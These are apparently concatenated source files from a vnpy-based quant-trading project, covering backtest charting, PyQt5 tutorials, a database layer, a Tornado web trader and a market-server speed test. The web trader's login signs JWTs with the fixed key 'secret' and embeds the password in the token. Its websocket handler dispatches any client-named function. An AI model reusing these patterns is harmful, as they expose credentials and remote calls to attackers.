kline = gen_kline(xaxis_data_list=x_axis_list, oclh_data_list=oclh_data_list, order_list=order_list)
else:
kline = Kline()
log_module.write_log("完成Kline实例化")
if strategy_tech_visual_list:
tech_line = gen_tech_line(xaxis_data_list=x_axis_list)
for tech_str in strategy_tech_visual_list:
            df = pd.DataFrame()
df[tech_str] = eval(tech_str)
df[tech_str].fillna(method='bfill', inplace=True)
y_axis_list = df[tech_str].tolist()
tech_line.add_yaxis(
series_name=tech_str,
y_axis=y_axis_list,
is_smooth=True,
linestyle_opts=opts.LineStyleOpts(opacity=0.5),
label_opts=opts.LabelOpts(is_show=False),
)
log_module.write_log("完成Kline 技术指标line数据处理")
# Overlap Kline + Line
kline = kline.overlap(tech_line)
log_module.write_log("完成Kline + tech_line实例化")
volume_bar = gen_volume_bar(xaxis_data_list=x_axis_list, volume_list=volume_list)
log_module.write_log("完成volume_bar实例化")
macd, signal, hist = am.macd(12, 26, 9, True)
macd[np.isnan(macd)] = 0
signal[np.isnan(signal)] = 0
hist[np.isnan(hist)] = 0
macd_bar_line = gen_macd_bar_line(
xaxis_data_list=x_axis_list,
macd_list=macd.tolist(),
dif_list=signal.tolist(),
deas_list=hist.tolist()
)
log_module.write_log("完成macd_bar_line实例化")
    # TODO: distinguish daily vs. minute-level backtests; the balance curve needs a different representation for each
balance_line = gen_balance_line(result_df)
log_module.write_log("完成balance_line实例化")
# 最后的 Grid
grid_chart = Grid(init_opts=opts.InitOpts(width="1400px", height="800px"))
    # write the bar data into the html as a JS global; there is no obvious way to pass
    # values across series, and the echarts demo passes them via a global variable too
    # barData must be the [open, close, low, high] rows that the JsCode color callbacks index
    grid_chart.add_js_funcs("var barData = {}".format(oclh_data_list))
pos_left = '10%'
pos_right = '1%'
height = 10
interval = 3
kline_height = 40
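    # rough vertical layout: the K-line pane takes 40% of the height, followed by the
    # volume, MACD and balance panes (10% each) separated by small gaps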
    # K-line chart with the overlaid indicator lines
grid_chart.add(
kline,
grid_opts=opts.GridOpts(pos_left=pos_left, pos_right=pos_right, height=f"{kline_height}%"),
)
    # volume bar chart
volume_pos_top = kline_height + 6 * interval
grid_chart.add(
volume_bar,
grid_opts=opts.GridOpts(
pos_left=pos_left, pos_right=pos_right, pos_top=f"{volume_pos_top}%", height=f"{height}%"
),
)
macd_pos_top = volume_pos_top + interval + height
# MACD DIFS DEAS
grid_chart.add(
macd_bar_line,
grid_opts=opts.GridOpts(
pos_left=pos_left, pos_right=pos_right, pos_top=f"{macd_pos_top}%", height=f"{height}%"
),
)
balance_pos_top = macd_pos_top + interval + height
grid_chart.add(
balance_line,
grid_opts=opts.GridOpts(
pos_left=pos_left, pos_right=pos_right, pos_top=f"{balance_pos_top}%", height=f"{height}%"
),
)
folder_path = get_folder_path("backtesting_result_pyecharts")
file_path = f"{folder_path}/render.html"
log_module.write_log("开始render保持网页...")
grid_chart.render(path=file_path)
log_module.write_log("完成绘制!")
return file_path
if __name__ == "__main__":
pass
```
#### File: experiments/Qt/untitled.py
```python
from PyQt5 import QtCore, QtGui, QtWidgets
class Ui_MainWindow(object):
def setupUi(self, MainWindow):
MainWindow.setObjectName("MainWindow")
MainWindow.resize(1019, 793)
self.centralwidget = QtWidgets.QWidget(MainWindow)
self.centralwidget.setObjectName("centralwidget")
self.verticalLayoutWidget = QtWidgets.QWidget(self.centralwidget)
self.verticalLayoutWidget.setGeometry(QtCore.QRect(730, 580, 160, 80))
self.verticalLayoutWidget.setObjectName("verticalLayoutWidget")
self.verticalLayout = QtWidgets.QVBoxLayout(self.verticalLayoutWidget)
self.verticalLayout.setContentsMargins(0, 0, 0, 0)
self.verticalLayout.setObjectName("verticalLayout")
self.pushButton = QtWidgets.QPushButton(self.verticalLayoutWidget)
self.pushButton.setObjectName("pushButton")
self.verticalLayout.addWidget(self.pushButton)
self.pushButton_2 = QtWidgets.QPushButton(self.verticalLayoutWidget)
self.pushButton_2.setObjectName("pushButton_2")
self.verticalLayout.addWidget(self.pushButton_2)
self.listView = QtWidgets.QListView(self.centralwidget)
self.listView.setGeometry(QtCore.QRect(210, 170, 256, 192))
self.listView.setObjectName("listView")
MainWindow.setCentralWidget(self.centralwidget)
self.menubar = QtWidgets.QMenuBar(MainWindow)
self.menubar.setGeometry(QtCore.QRect(0, 0, 1019, 30))
self.menubar.setObjectName("menubar")
MainWindow.setMenuBar(self.menubar)
self.statusbar = QtWidgets.QStatusBar(MainWindow)
self.statusbar.setObjectName("statusbar")
MainWindow.setStatusBar(self.statusbar)
self.retranslateUi(MainWindow)
self.pushButton.clicked.connect(self.listView.selectAll)
self.pushButton_2.clicked.connect(MainWindow.close)
QtCore.QMetaObject.connectSlotsByName(MainWindow)
def retranslateUi(self, MainWindow):
_translate = QtCore.QCoreApplication.translate
MainWindow.setWindowTitle(_translate("MainWindow", "MainWindow"))
self.pushButton.setText(_translate("MainWindow", "PushButton"))
self.pushButton_2.setText(_translate("MainWindow", "PushButton"))
```
#### File: zetcode_tutorial/C3_Menus_and_toolbars/c8_4_checkMenu.py
```python
__author__ = 'Fangyang'
import sys
from PyQt5.QtWidgets import QAction, QMainWindow, QApplication
class Example(QMainWindow):
def __init__(self):
super().__init__()
self.initUI()
def initUI(self):
self.statusBar = self.statusBar()
self.statusBar.showMessage('ready')
menuBar = self.menuBar()
viewMenu = menuBar.addMenu('View')
viewStatAct = QAction('View status bar', self, checkable=True)
viewStatAct.setStatusTip('View status bar RRRRRRRR')
viewStatAct.setChecked(True)
viewStatAct.triggered.connect(self.toggleMenu)
viewMenu.addAction(viewStatAct)
self.setGeometry(300, 300, 300, 300)
self.setWindowTitle('Sub menu')
self.show()
def toggleMenu(self, state):
if state:
self.statusBar.show()
else:
self.statusBar.hide()
if __name__ == '__main__':
app = QApplication(sys.argv)
ex = Example()
sys.exit(app.exec_())
```
#### File: zetcode_tutorial/C5_Events_and_signals/c4_event_source.py
```python
__author__ = 'Fangyang'
import sys
from PyQt5.QtCore import Qt
from PyQt5.QtWidgets import (
QMainWindow, QApplication, QPushButton
)
class Example(QMainWindow):
def __init__(self):
super().__init__()
self.initUI()
def initUI(self):
btn1 = QPushButton('Button 1', self)
btn1.move(30, 50)
btn2 = QPushButton("Button 2", self)
btn2.move(150, 50)
btn1.clicked.connect(self.buttonClicked)
btn2.clicked.connect(self.buttonClicked)
self.statusBar()
self.setGeometry(300, 300, 300, 300)
self.setWindowTitle('Event sender')
self.show()
def buttonClicked(self):
sender = self.sender()
self.statusBar().showMessage(sender.text() + ' was pressed')
if __name__ == '__main__':
app = QApplication(sys.argv)
ex = Example()
sys.exit(app.exec_())
```
#### File: zetcode_tutorial/C6_Dialogs/c4_file_dialog.py
```python
from PyQt5.QtWidgets import (
QMainWindow, QTextEdit, QAction, QFileDialog, QApplication
)
from PyQt5.QtGui import QIcon
import sys
class Example(QMainWindow):
def __init__(self):
super().__init__()
self.init_ui()
def init_ui(self):
self.text_edit = QTextEdit()
self.setCentralWidget(self.text_edit)
self.statusBar()
open_file = QAction(QIcon('../web.png'), 'Open', self)
open_file.setShortcut('Ctrl+O')
open_file.setStatusTip('Open new File')
open_file.triggered.connect(self.showDialog)
menu_bar = self.menuBar()
file_menu = menu_bar.addMenu('&File')
file_menu.addAction(open_file)
self.setGeometry(300, 300, 350, 300)
self.setWindowTitle('File dialog')
self.show()
def showDialog(self):
fname = QFileDialog.getOpenFileName(self, 'Open file', '/home')
if fname[0]:
f = open(fname[0], 'r')
with f:
data = f.read()
self.text_edit.setText(data)
if __name__ == '__main__':
app = QApplication(sys.argv)
ex = Example()
sys.exit(app.exec_())
```
#### File: zetcode_tutorial/C8_Widgets_II/c4_QComboBox.py
```python
from PyQt5.QtWidgets import (
QWidget, QLabel, QComboBox, QVBoxLayout, QApplication
)
import sys
class Example(QWidget):
def __init__(self):
super().__init__()
self.initUI()
def initUI(self):
self.lbl = QLabel('Manjaro', self)
vbox = QVBoxLayout(self)
vbox.addWidget(self.lbl)
combo = QComboBox(self)
combo.addItem('Ubuntu')
combo.addItem('Mandriva')
combo.addItem('Fedora')
combo.addItem('Arch')
combo.addItem('Gentoo')
vbox.addWidget(combo)
# combo.move(50, 50)
# self.lbl.move(50, 150)
combo.activated[str].connect(self.onActivated)
self.setLayout(vbox)
self.setGeometry(300, 300, 250, 150)
self.setWindowTitle('QComboBox')
self.show()
def onActivated(self, text):
self.lbl.setText(text)
self.lbl.adjustSize()
if __name__ == '__main__':
app = QApplication(sys.argv)
ex = Example()
sys.exit(app.exec_())
```
#### File: zetcode_tutorial/C9_Drag_and_drop/c1_simple_drag_drop.py
```python
from PyQt5.QtWidgets import (
QPushButton, QWidget, QLineEdit, QApplication
)
import sys
class Button(QPushButton):
def __init__(self, title, parent):
super().__init__(title, parent)
self.setAcceptDrops(True)
def dragEnterEvent(self, e):
if e.mimeData().hasFormat('text/plain'):
e.accept()
else:
e.ignore()
def dropEvent(self, e):
self.setText(e.mimeData().text())
class Example(QWidget):
def __init__(self):
super(Example, self).__init__()
self.initUI()
def initUI(self):
edit = QLineEdit('', self)
edit.setDragEnabled(True)
edit.move(30, 65)
button = Button('Button', self)
button.move(190, 65)
self.setWindowTitle('Simple drag and drop')
self.setGeometry(300, 300, 300, 150)
if __name__ == '__main__':
app = QApplication(sys.argv)
ex = Example()
ex.show()
sys.exit(app.exec_())
```
#### File: jnpy/utils/data_manager.py
```python
from typing import List
import pandas as pd
from vnpy.trader.object import BarData
from vnpy.trader.utility import ArrayManager
class ArrayManagerWithDatetime(ArrayManager):
def __init__(self, size: int = 100):
super(ArrayManagerWithDatetime, self).__init__(size=size)
        # numpy (as used here) does not handle datetime objects, so they are kept in a plain list
self.datetime_list: List = []
self.df = pd.DataFrame(
[],
columns=[
"datetime", "open", "high", "low", "close",
"volume", "turnover", "open_interest"]
)
@property
def datetime(self) -> List:
"""
Get trading datetime time series list.
"""
return self.datetime_list
def update_bar(self, bar: BarData) -> None:
super().update_bar(bar)
self.datetime.append(bar.datetime)
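        # cap the list at `size` so it stays aligned with the rolling numpy arrays in ArrayManager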
if len(self.datetime) > self.size:
self.datetime.pop(0)
if len(self.datetime) == self.size:
self.df = pd.DataFrame(
{
"datetime": self.datetime,
"open": self.open, "high": self.high, "low": self.low, "close": self.close,
"volume": self.volume, "turnover": self.turnover,
"open_interest": self.open_interest,
}
)
if __name__ == "__main__":
pass
```
#### File: apps/login/handler.py
```python
import json
import jwt
from jnpy.WebTrader.base_handler import BaseRestfulHandler
from jnpy.WebTrader.settings import get_global_config_json_dict
class LoginHandler(BaseRestfulHandler):
async def post(self, *args, **kwargs):
r_dict = {'token': ''}
account_info = {
'username': self.get_body_argument('username'),
'password': self.get_body_argument('password')
}
if account_info['username'] == self.global_settings['web_trader']['username'] \
and account_info['password'] == self.global_settings['web_trader']['password']:
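            # issue an HS256-signed JWT carrying the submitted credentials back to the client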
encoded_jwt = jwt.encode(account_info, 'secret', algorithm='HS256')
encoded_jwt_str = str(encoded_jwt)
# an = jwt.decode(encoded_jwt, 'secret', algorithms=['HS256'])
r_dict['token'] = encoded_jwt_str
self.log.write_log('login success.')
self.write(r_dict)
else:
self.log.write_log('login username or password wrong.')
self.write(r_dict)
if __name__ == "__main__":
pass
```
#### File: apps/monitor/handler.py
```python
import json
import time
from typing import Union, Optional, Awaitable
from vnpy.trader.constant import Exchange, Interval
from jnpy.WebTrader.base_handler import BaseWebSocketHandler
from jnpy.WebTrader.settings import get_global_config_json_dict
from jnpy.WebTrader.constant import DATETIME_FORMAT
from jnpy.WebTrader.apps.monitor import middleware
class MonitorWssHandler(BaseWebSocketHandler):
def open(self, *args: str, **kwargs: str) -> Optional[Awaitable[None]]:
# in_client = ('192.168.0.108', 56986)
in_client = self.request.server_connection.context.address
middleware.main_engine.update_tornado_client(self)
re_data = json.dumps(middleware.init_engine())
self.write_message(re_data)
print("MonitorWssHandler", in_client)
def on_message(self, message: Union[str, bytes]) -> Optional[Awaitable[None]]:
re_data_dict = json.loads(message)
# 业务函数名即字典的key, value为入参, 出参为反馈前端信息
# [self.write_message(getattr(middleware, key)(**value)) for key, value in re_data_dict.items()]
for key, value in re_data_dict.items():
re_data = getattr(middleware, key)(**value)
if re_data:
self.write_message(re_data)
class MonitorSystemInfoWssHandler(BaseWebSocketHandler):
def open(self, *args: str, **kwargs: str) -> Optional[Awaitable[None]]:
# in_client = ('192.168.0.108', 56986)
in_client = self.request.server_connection.context.address
print("MonitorSystemInfoWssHandler", in_client)
def on_message(self, message: Union[str, bytes]) -> Optional[Awaitable[None]]:
re_data_dict = json.loads(message)
if "gateway_connect" in re_data_dict:
middleware.gateway_connect(re_data_dict['gateway_connect'])
re_data = json.dumps(middleware.gen_exchange_contract_info())
self.write_message(re_data)
elif "" in re_data_dict:
middleware
print(1)
if __name__ == "__main__":
x = [i.name for i in list(Interval)]
print(1)
```
#### File: jnpy/WebTrader/settings.py
```python
from vnpy.trader.utility import get_folder_path, load_json
from vnpy.trader.setting import SETTINGS, SETTING_FILENAME
def get_global_config_json_dict():
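    # merge every *.json file under the .vntrader folder with the in-memory global SETTINGS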
config_dict = {ele.stem: load_json(ele) for ele in get_folder_path('.').glob('*.json')}
config_dict[SETTING_FILENAME.split('.')[0]] = SETTINGS
return config_dict
if __name__ == "__main__":
# global_settings_dict = {}
# x = TRADER_DIR
# vntrader_path = get_folder_path('.')
# xx = [i for i in vntrader_path.iterdir() if i.is_dir()]
# xxx = list(vntrader_path.glob('*.json'))
# y = xxx[0].stem
# global_settings_dict = {ele.stem: load_json(ele) for ele in vntrader_path.glob('*.json')}
dd = get_global_config_json_dict()
print(1)
```
#### File: vnpy/trader/database.py
```python
from abc import ABC, abstractmethod
from datetime import datetime
from typing import List
from dateutil.tz import tz
from pytz import timezone
from dataclasses import dataclass
from importlib import import_module
from .constant import Interval, Exchange
from .object import BarData, TickData
from .setting import SETTINGS
DB_TZ = timezone(SETTINGS["database.timezone"])
# use this tz in datetime tzinfo, remove 6min problem
DATETIME_TZ = tz.gettz('Asia/Shanghai')
def convert_tz(dt: datetime) -> datetime:
"""
Convert timezone of datetime object to DB_TZ.
"""
dt = dt.astimezone(DB_TZ)
return dt.replace(tzinfo=None)
@dataclass
class BarOverview:
"""
Overview of bar data stored in database.
"""
symbol: str = ""
exchange: Exchange = None
interval: Interval = None
count: int = 0
start: datetime = None
end: datetime = None
class BaseDatabase(ABC):
"""
Abstract database class for connecting to different database.
"""
@abstractmethod
def save_bar_data(self, bars: List[BarData]) -> bool:
"""
Save bar data into database.
"""
pass
@abstractmethod
def save_tick_data(self, ticks: List[TickData]) -> bool:
"""
Save tick data into database.
"""
pass
@abstractmethod
def load_bar_data(
self,
symbol: str,
exchange: Exchange,
interval: Interval,
start: datetime,
end: datetime
) -> List[BarData]:
"""
Load bar data from database.
"""
pass
@abstractmethod
def load_tick_data(
self,
symbol: str,
exchange: Exchange,
start: datetime,
end: datetime
) -> List[TickData]:
"""
Load tick data from database.
"""
pass
@abstractmethod
def delete_bar_data(
self,
symbol: str,
exchange: Exchange,
interval: Interval
) -> int:
"""
Delete all bar data with given symbol + exchange + interval.
"""
pass
@abstractmethod
def delete_tick_data(
self,
symbol: str,
exchange: Exchange
) -> int:
"""
Delete all tick data with given symbol + exchange.
"""
pass
@abstractmethod
def get_bar_overview(self) -> List[BarOverview]:
"""
        Return data available in database.
"""
pass
database: BaseDatabase = None
def get_database() -> BaseDatabase:
""""""
# Return database object if already inited
global database
if database:
return database
# Read database related global setting
database_name: str = SETTINGS["database.name"]
module_name: str = f"vnpy_{database_name}"
# Try to import database module
try:
module = import_module(module_name)
except ModuleNotFoundError:
print(f"找不到数据库驱动{module_name},使用默认的SQLite数据库")
module = import_module("vnpy_sqlite")
# Create database object from module
database = module.Database()
return database
``` |
{
"source": "jojoquant/jonpy",
"score": 2
} |
#### File: datasource/jotdx/ips.py
```python
from jotdx.exhq import TdxExHq_API
from jotdx.hq import TdxHq_API
import time
from jnpy.utils.logging.log import LogModule
class IPsSource:
def __init__(self):
self.hq_ips_dict = {
"深圳双线主站1": ("192.168.3.11", 7709),
"深圳双线主站2": ("172.16.17.32", 7709),
"深圳双线主站3": ("172.16.31.10", 7709),
"深圳双线主站4": ("192.168.127.12", 7709),
"深圳双线主站5": ("192.168.127.12", 7709),
"深圳双线主站6": ("172.16.31.10", 7709),
"上海双线主站1": ("172.16.17.32", 7709),
"上海双线主站2": ("192.168.127.12", 7709),
"上海双线主站3": ("192.168.3.11", 7709),
"上海双线主站4": ("192.168.127.12", 7709),
"上海双线主站5": ("192.168.3.11", 7709),
"上海双线主站6": ("172.16.58.3", 7709),
"北京双线主站1": ("172.16.58.3", 7709),
"北京双线主站2": ("172.16.31.10", 7709),
"北京双线主站3": ("192.168.3.11", 7709),
"东莞电信主站": ("192.168.127.12", 7721),
"广州双线主站1": ("172.16.31.10", 7709),
"广州双线主站2": ("172.16.31.10", 7709),
"广州双线主站3": ("192.168.3.11", 7709)
}
self.exhq_ips_dict = {
"扩展市场深圳双线": ("192.168.3.11", 7727),
# "扩展市场北京双线": ("172.16.17.32", 7727),
"扩展市场深圳双线3": ("172.16.31.10", 7727),
"扩展市场武汉主站1": ("172.16.17.32", 7727),
"扩展市场武汉主站2": ("172.16.31.10", 7727),
"扩展市场上海双线1": ("172.16.17.32", 7727),
"扩展市场上海双线2": ("172.16.17.32", 7727),
}
self.log = LogModule(name="IPsSource", level="info")
def get_fast_exhq_ip(self) -> (str, int):
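        # Probe every configured extended-market (exhq) server once, record the
        # response time of a simple instrument-count request, and return the
        # address of the fastest responder.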
fast_exhq_ip_dict = {}
exhq_api = TdxExHq_API()
for name, (ip, exhq_port) in self.exhq_ips_dict.items():
try:
with exhq_api.connect(ip, exhq_port):
start_time = time.time()
instrument_count = exhq_api.get_instrument_count()
cost_time = time.time() - start_time
self.log.write_log(f"{name}({ip}), time: {cost_time:.3f}s, response: {instrument_count}")
fast_exhq_ip_dict[f"{ip}:{exhq_port}"] = cost_time
except:
print(f"高能预警 ! 扩展行情异常捕获: {ip}:{exhq_port}可能宕机了报错了!")
ip_str, port_str = min(fast_exhq_ip_dict, key=fast_exhq_ip_dict.get).split(":")
self.log.write_log(f"-" * 50)
self.log.write_log(f"Select ({ip_str} : {port_str})")
self.log.write_log(f"-" * 50)
return ip_str, int(port_str)
def get_fast_hq_ip(self) -> (str, int):
fast_hq_ip_dict = {}
hq_api = TdxHq_API()
for name, (ip, hq_port) in self.hq_ips_dict.items():
try:
with hq_api.connect(ip, hq_port):
start_time = time.time()
instrument_count = hq_api.get_security_count(0)
cost_time = time.time() - start_time
self.log.write_log(f"{name}({ip}), time: {cost_time:.3f}s, response: {instrument_count}")
fast_hq_ip_dict[f"{ip}:{hq_port}"] = cost_time
except:
print(f"高能预警 ! 标准行情异常捕获: {ip}:{hq_port}可能宕机了报错了!")
ip_str, port_str = min(fast_hq_ip_dict, key=fast_hq_ip_dict.get).split(":")
self.log.write_log(f"-" * 50)
self.log.write_log(f"Select ({ip_str} : {port_str})")
self.log.write_log(f"-" * 50)
return ip_str, int(port_str)
if __name__ == '__main__':
ips_pool = IPsSource()
exhq_ip, exhq_port = ips_pool.get_fast_exhq_ip()
hq_ip, hq_port = ips_pool.get_fast_hq_ip()
print(1)
```
#### File: jnpy/utils/timeit.py
```python
import time
from functools import wraps
def timeit_cls_method_wrapper(func):
@wraps(func) # --> 4
def clocked(self, *args, **kwargs): # -- 1
"""this is inner clocked function"""
start_time = time.time()
result = func(self, *args, **kwargs) # --> 2
print(func.__name__ + " func time_cost -> {:.2f}s".format(time.time() - start_time))
return result
return clocked # --> 3
def timeit_function_wrapper(func):
@wraps(func) # --> 4
def clocked(*args, **kwargs): # -- 1
"""this is inner clocked function"""
start_time = time.time()
result = func(*args, **kwargs) # --> 2
print(func.__name__ + " func time_cost -> {:.2f}s".format(time.time() - start_time))
return result
return clocked # --> 3
if __name__ == "__main__":
pass
``` |
{
"source": "jojoquant/jotdx",
"score": 2
} |
#### File: jotdx/example/bars.py
```python
from jotdx.params import TDXParams
from jotdx.quotes import Quotes
from mock_params import Interval_to_frequency_dict, Interval
from jotdx.utils import to_data
def std_bars_test():
frequency = Interval_to_frequency_dict[Interval.MINUTE_15]
market = 0
symbol = "123075"
start = 0
offset = 100
quotes = Quotes.factory(market='std')
df = quotes.bars(
symbol=symbol, frequency=frequency, offset=offset, start=start
)
df2_list = quotes.client.get_security_bars(
int(frequency), int(market), str(symbol), int(start), int(offset)
)
df2 = to_data(df2_list)
print(1)
def ext_bars_test():
frequency = Interval_to_frequency_dict[Interval.MINUTE]
market = 0
symbol = "RBL8"
start = 0
offset = 100
quotes = Quotes.factory(market='ext')
df = quotes.bars(
market=30,
symbol=symbol, frequency=frequency, offset=offset, start=start
)
print(1)
def ext_bars_pytdx_test():
from jotdx.exhq import TdxExHq_API
api = TdxExHq_API()
# 192.168.3.11 : 7727
with api.connect('192.168.3.11', 7727):
df1 = api.to_df(api.get_markets())
df2 = api.to_df(api.get_instrument_info(0, 800))
df3 = api.to_df(api.get_instrument_quote_list(30, 3, count=800))
df4 = api.to_df(api.get_instrument_quote_list(30, 3, start=100, count=800))
print(2)
if __name__ == '__main__':
# std_bars_test()
# ext_bars_test()
ext_bars_pytdx_test()
```
#### File: jotdx/bin/hqget.py
```python
from __future__ import unicode_literals
import os
import sys
import click
from collections import OrderedDict
import pprint
if __name__ == '__main__':
sys.path.insert(0, os.path.dirname(os.path.dirname(os.path.dirname(os.path.realpath(__file__)))))
from pytdx.hq import TdxHq_API
from pytdx.params import TDXParams
from pytdx.config.hosts import hq_hosts
import pandas as pd
import pickle
from functools import reduce
# let pandas display all rows and columns
pd.set_option('display.max_columns', None)
pd.set_option('display.max_rows', None)
mtstr = os.getenv("TDX_MT", "")
mt = False
if mtstr:
mt = True
api = TdxHq_API(multithread=mt)
def get_security_quotes(params):
market, code = params
stocks = api.get_security_quotes([(int(market), code),])
return (stocks)
def get_security_bars(params):
category, market, code, start, count = params
return (api.get_security_bars(int(category), int(market), code, int(start), int(count)))
def get_security_count(params):
return (api.get_security_count(int(params[0])))
def get_security_list(params):
return (api.get_security_list(int(params[0]), int(params[1])))
def get_index_bars(params):
category, market, code, start, count = params
return (api.get_index_bars(int(category), int(market), code, int(start), int(count)))
def get_minute_time_data(params):
return (api.get_minute_time_data(int(params[0]), params[1]))
def get_history_minute_time_data(params):
return (api.get_history_minute_time_data(int(params[0]), params[1], int(params[2])))
def get_transaction_data(params):
return (api.get_transaction_data(int(params[0]), params[1], int(params[2]), int(params[3])))
def get_history_transaction_data(params):
return (api.get_history_transaction_data(int(params[0]), params[1], int(params[2]), int(params[3]), int(params[4])))
def get_company_info_category(params):
return (api.get_company_info_category(int(params[0]), params[1]))
def get_company_info_content(params):
return (api.get_company_info_content(int(params[0]), params[1].encode("utf-8"), params[2].encode("utf-8"), int(params[3]), int(params[4])))
def get_xdxr_info(params):
return (api.get_xdxr_info(int(params[0]), params[1]))
def get_finance_info(params):
return (api.get_finance_info(int(params[0]), params[1]))
FUNCTION_LIST = OrderedDict(
[
(1, ['获取股票行情', '参数:市场代码, 股票代码, 如: 0,000001 或 1,600300', get_security_quotes, '0,000001']),
(2, ['获取k线', '''category-> K线种类
0 5分钟K线 1 15分钟K线 2 30分钟K线 3 1小时K线 4 日K线
5 周K线
6 月K线
7 1分钟
8 1分钟K线 9 日K线
10 季K线
11 年K线
market -> 市场代码 0:深圳,1:上海
stockcode -> 证券代码;
start -> 指定的范围开始位置;
count -> 用户要请求的 K 线数目,最大值为 800
如: 9,0,000001,0,100''', get_security_bars, '9,0,000001,0,100']),
(3, ['获取市场股票数量', '参数:市场代码, 股票代码, 如: 0 或 1', get_security_count, '0']),
(4, ['获取股票列表', '参数:市场代码, 起始位置, 数量 如: 0,0 或 1,100', get_security_list, '0,0']),
(5, ['获取指数k线', """参数:
category-> K线种类
0 5分钟K线 1 15分钟K线 2 30分钟K线 3 1小时K线 4 日K线
5 周K线
6 月K线
7 1分钟
8 1分钟K线 9 日K线
10 季K线
11 年K线
market -> 市场代码 0:深圳,1:上海
stockCode -> 证券代码;
start -> 指定的范围开始位置; count -> 用户要请求的 K 线数目
如:9,1,000001,0,100""", get_index_bars, '9,1,000001,0,100']),
(6, ['查询分时行情', "参数:市场代码, 股票代码, 如: 0,000001 或 1,600300", get_minute_time_data, '0,000001']),
(7, ['查询历史分时行情', '参数:市场代码, 股票代码,时间 如: 0,000001,20161209 或 1,600300,20161209', get_history_minute_time_data, '0,000001,20161209']),
(8, ['查询分笔成交', '参数:市场代码, 股票代码,起始位置, 数量 如: 0,000001,0,10', get_transaction_data, '0,000001,0,10']),
(9, ['查询历史分笔成交', '参数:市场代码, 股票代码,起始位置,日期 数量 如: 0,000001,0,10,20170209', get_history_transaction_data, '0,000001,0,10,20170209']),
(10, ['查询公司信息目录','参数:市场代码, 股票代码, 如: 0,000001 或 1,600300', get_company_info_category, '0,000001']),
(11, ['读取公司信息详情', '参数:市场代码, 股票代码, 文件名, 起始位置, 数量, 如:0,000001,000001.txt,2054363,9221', get_company_info_content, '0,000001,000001.txt,0,10']),
(12, ['读取除权除息信息', '参数:市场代码, 股票代码, 如: 0,000001 或 1,600300', get_xdxr_info, '0,000001']),
(13, ['读取财务信息', '参数:市场代码, 股票代码, 如: 0,000001 或 1,600300', get_finance_info, '0,000001']),
]
)
# 1 : 招商证券深圳行情 172.16.17.32:7709
# 2 : 华泰证券(南京电信) 172.16.58.3:7709
# 3 : 华泰证券(上海电信) 172.16.17.32:7709
# 4 : 华泰证券(上海电信二) 192.168.3.11:7709
# 5 : zz
SERVERS = OrderedDict([
(1, ['招商证券深圳行情', '172.16.17.32:7709']),
(2, ['华泰证券(南京电信)', '172.16.58.3:7709']),
(3, ['华泰证券(上海电信)', '172.16.17.32:7709']),
(4, ['华泰证券(上海电信二)', '192.168.3.11:7709']),
(5, ['华泰证券(深圳电信)', '172.16.17.32:7709']),
(6, ['华泰证券(武汉电信)', '192.168.127.12:7709']),
(7, ['华泰证券(天津联通)', '172.16.17.32:7709']),
(8, ['华泰证券(沈阳联通)', '172.16.17.32:7709']),
(9, ['华泰证券(南京联通)', '172.16.31.10:7709']),
(10, ['华泰证券(南京联通)', '172.16.31.10:7709']),
])
def connect():
while True:
click.secho("请选择服务器")
click.secho("-" * 20)
for k,v in SERVERS.items():
click.secho("[%d] :%s (%s)" % (k, v[0], v[1]))
click.secho("-" * 20)
num = click.prompt("请输入序号 ", type=int, default=1)
if num not in SERVERS:
click.echo("序号错误")
continue
ip,port = SERVERS[num][1].split(":")
c = api.connect(ip, int(port))
if not c:
raise Exception("无法连接")
else:
break
def connect_to(ipandport):
ip, port = ipandport.split(":")
c = api.connect(ip, int(port))
if not c:
raise Exception("无法连接")
def disconnect():
api.disconnect()
if sys.version_info[0] == 2:
reload(sys)
sys.setdefaultencoding('utf8')
FUNCTION_LIST_STR = "0 : 使用交互式接口\n"
for x, y in FUNCTION_LIST.items():
FUNCTION_LIST_STR = FUNCTION_LIST_STR + str(x) + " : " + y[0] + "\n"
@click.command()
@click.option('-f', '--function', default=0, type=click.INT, help="选择使用的功能" + "\n" + FUNCTION_LIST_STR)
@click.option('--df/--no-df', default=True, help="是否使用Pandas Dataframe显示")
@click.option('-o', '--output', default="-", help="保存到文件,默认不保存")
@click.option('-s', '--server', default="-", type=click.STRING, help="连接的服务器,设定之后直接连接该服务器,无需选择" )
@click.option('--all/--no-all', default=False, help="显示全部服务器列表")
def main(function, df, output, server, all):
"""
股票行情获取程序, 作者RainX<<EMAIL>>
"""
if all:
global SERVERS
SERVERS = OrderedDict([(idx+1, [host[0], "%s:%s" % (host[1], host[2])]) for idx, host in enumerate(hq_hosts)])
click.secho("连接中.... ", fg="green")
if server == '-':
connect()
else:
connect_to(server)
click.secho("连接成功!", fg="green")
if function == 0:
while True:
click.secho("-" * 20)
click.secho("功能列表:")
for (k,v) in FUNCTION_LIST.items():
click.secho(str(k) + " : " + v[0], bold=True)
last = k + 1
click.secho(str(last) + " : 退出断开连接", bold=True)
click.secho("-" * 20)
value = click.prompt('请输入要使用的功能', type=int)
if value == last:
break
run_function(df, value)
click.secho("-" * 20)
click.echo("按任意键继续")
click.getchar()
elif function in FUNCTION_LIST.keys():
value = function
result = run_function(df, value)
if (result is not None) and (output != "-"):
click.secho("写入结果到 " + output)
if isinstance(result, pd.DataFrame):
result.to_csv(output)
else:
with open(output, "wb") as f:
pickle.dump(result, f)
click.secho("断开连接中.... ", fg="green")
disconnect()
click.secho("断开连接成功!", fg="green")
def run_function(df, value):
click.secho("你选择的是功能 " + str(value) + " : " + FUNCTION_LIST[value][0])
click.secho("-" * 20)
click.secho(FUNCTION_LIST[value][1])
params_str = click.prompt("请输入参数 ", type=str, default=FUNCTION_LIST[value][3])
params = [p.strip() for p in params_str.split(",")]
click.secho("-" * 20)
try:
result = FUNCTION_LIST[value][2](params)
if df:
result = api.to_df(result)
click.secho(str(result), bold=True)
return result
else:
pprint.pprint(result)
return result
except Exception as e:
import traceback
print('-' * 60)
traceback.print_exc(file=sys.stdout)
print('-' * 60)
click.secho("发生错误,错误信息为: " + str(e), fg='red')
if __name__ == '__main__':
main()
```
#### File: jotdx/bin/hqreader.py
```python
from __future__ import unicode_literals, division
import click
import sys
import os
if __name__ == '__main__':
sys.path.insert(0, os.path.dirname(os.path.dirname(os.path.dirname(os.path.realpath(__file__)))))
from pytdx.reader import TdxDailyBarReader, TdxFileNotFoundException, TdxNotAssignVipdocPathException
from pytdx.reader import TdxMinBarReader
from pytdx.reader import TdxLCMinBarReader
from pytdx.reader import TdxExHqDailyBarReader
from pytdx.reader import GbbqReader
from pytdx.reader import BlockReader
from pytdx.reader import CustomerBlockReader
